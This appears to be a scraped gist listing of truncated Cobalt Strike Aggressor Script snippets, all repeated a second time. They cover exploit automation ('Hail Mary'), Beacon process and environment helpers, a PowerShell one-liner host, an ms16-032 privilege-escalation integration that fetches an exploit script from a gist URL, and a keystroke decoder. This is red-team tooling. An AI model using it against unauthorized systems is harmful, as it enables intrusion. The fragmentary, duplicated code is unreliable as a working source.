Raphael rsmudge

## gist:6717127
#
# This code is related to the Attacks -> Find Attacks and Attacks -> Hail Mary features
#

sub exploitPorts {
  local('$exploit %exploits $options $port');

	foreach $exploit (modules("exploits")) {
		$options = options("exploit", $exploit);
		if ('RPORT' in $options) {

## gist:6717164
#
# This code is related to the Attacks -> Find Attacks and Attacks -> Hail Mary features
#

popup attacks {
        item "&Find Attacks" {
                spawn(&runFindAttacks);
        }

        item "&Hail Mary" {

## irc.cna
#
# Quick/Dirty IRC Library for use with Aggressor Script
# https://www.cobaltstrike.com/aggressor-script/index.html
#

# irc_close($handle);
sub irc_close {
	println($1, "QUIT :Good bye!");
	closef($1);
}

## getexplorer.cna
# getexplorerpid($bid, &callback);
sub getexplorerpid {
  bps($1, lambda({
    local('$pid $name $entry');
    foreach $entry (split("\n", $2)) {
      ($name, $pid) = split("\\s+", $entry);
      if ($name eq "explorer.exe") {
        # $1 is our Beacon ID, $pid is the PID of explorer.exe
        [$callback: $1, $pid];
      }

## getenv.cna
#
# Aggressor Script means to parse/use environment vars in a Beacon session.
#

global('%bvars');

# request environment variables for every new Beacon that comes in.
on beacon_initial {
	# ideally, we'd have a bshell that could take callbacks. We don't have
	# this yet. Eventually though, we will.

## getpidany.cna
# getexplorerpid($bid, &callback);
sub getanypid {
  bps($1, lambda({
    local('$pid $name $entry');
    foreach $entry (split("\n", $2)) {
      ($name, $pid) = split("\\s+", $entry);
      if ($name eq $proc) {
        # $1 is our Beacon ID, $pid is the PID of $proc
        [$callback: $1, $proc, $pid];
      }

## bot.cna
# demonstrate an example of inversion-of-control with Aggressor Script
#

# co-routine,
sub bot {
	# run pwd and get the output.
	bpwd($bid);
	when("beacon_output_alt", $this);
	yield;

## oneliner.cna
# host a PowerShell script on a one-off web server via Beacon.
#
# Why? Generate one-liners for length constrained command execution opportunities
#
# NOTE: this uses internal APIs and is subject to break in the next release. Don't hate!
#       if there's interest in this capability, I can build an official API for it.

import common.*;
import beacon.*;

## ms16-032.cna
# Quick script to integrate ms16-032 attack into Cobalt Strike's Beacon
#
# 0. the &beacon_host_script function was added in Cobalt Strike 3.4 (you need CS 3.4 or later)
# 1. grab MS16-032.ps1
# https://gist.githubusercontent.com/benichmt1/af52401c7f2d6984dea6ba60b44aa1aa/raw/bc6f579e694fc9a752e1a1dd95886c464f575ee7/MS16-032.ps1
# 2. store it with this script
# 3. Use 'ms16-032 "listener name"' or 'ms16-032' from Beacon to run this attack

# logic to run this particular attack
sub exploit {

## webkeystrokes.cna
# convert comma separated keystroke values into a string.
sub toString {
	local('@temp');
	@temp = split(",", $1);
	shift(@temp);

	return join("", map({
		return chr(parseNumber($1, 16, 10));
	}, @temp));
}
	#
	# This code is related to the Attacks -> Find Attacks and Attacks -> Hail Mary features
	#

	sub exploitPorts {
	local('$exploit %exploits $options $port');

	foreach $exploit (modules("exploits")) {
	$options = options("exploit", $exploit);
	if ('RPORT' in $options) {
	#
	# This code is related to the Attacks -> Find Attacks and Attacks -> Hail Mary features
	#

	popup attacks {
	item "&Find Attacks" {
	spawn(&runFindAttacks);
	}

	item "&Hail Mary" {
	#
	# Quick/Dirty IRC Library for use with Aggressor Script
	# https://www.cobaltstrike.com/aggressor-script/index.html
	#

	# irc_close($handle);
	sub irc_close {
	println($1, "QUIT :Good bye!");
	closef($1);
	}
	# getexplorerpid($bid, &callback);
	sub getexplorerpid {
	bps($1, lambda({
	local('$pid $name $entry');
	foreach $entry (split("\n", $2)) {
	($name, $pid) = split("\\s+", $entry);
	if ($name eq "explorer.exe") {
	# $1 is our Beacon ID, $pid is the PID of explorer.exe
	[$callback: $1, $pid];
	}
	#
	# Aggressor Script means to parse/use environment vars in a Beacon session.
	#

	global('%bvars');

	# request environment variables for every new Beacon that comes in.
	on beacon_initial {
	# ideally, we'd have a bshell that could take callbacks. We don't have
	# this yet. Eventually though, we will.
	# getexplorerpid($bid, &callback);
	sub getanypid {
	bps($1, lambda({
	local('$pid $name $entry');
	foreach $entry (split("\n", $2)) {
	($name, $pid) = split("\\s+", $entry);
	if ($name eq $proc) {
	# $1 is our Beacon ID, $pid is the PID of $proc
	[$callback: $1, $proc, $pid];
	}
	# demonstrate an example of inversion-of-control with Aggressor Script
	#

	# co-routine,
	sub bot {
	# run pwd and get the output.
	bpwd($bid);
	when("beacon_output_alt", $this);
	yield;
	# host a PowerShell script on a one-off web server via Beacon.
	#
	# Why? Generate one-liners for length constrained command execution opportunities
	#
	# NOTE: this uses internal APIs and is subject to break in the next release. Don't hate!
	# if there's interest in this capability, I can build an official API for it.

	import common.*;
	import beacon.*;
	# Quick script to integrate ms16-032 attack into Cobalt Strike's Beacon
	#
	# 0. the &beacon_host_script function was added in Cobalt Strike 3.4 (you need CS 3.4 or later)
	# 1. grab MS16-032.ps1
	# https://gist.githubusercontent.com/benichmt1/af52401c7f2d6984dea6ba60b44aa1aa/raw/bc6f579e694fc9a752e1a1dd95886c464f575ee7/MS16-032.ps1
	# 2. store it with this script
	# 3. Use 'ms16-032 "listener name"' or 'ms16-032' from Beacon to run this attack

	# logic to run this particular attack
	sub exploit {
	# convert comma separated keystroke values into a string.
	sub toString {
	local('@temp');
	@temp = split(",", $1);
	shift(@temp);

	return join("", map({
	return chr(parseNumber($1, 16, 10));
	}, @temp));
	}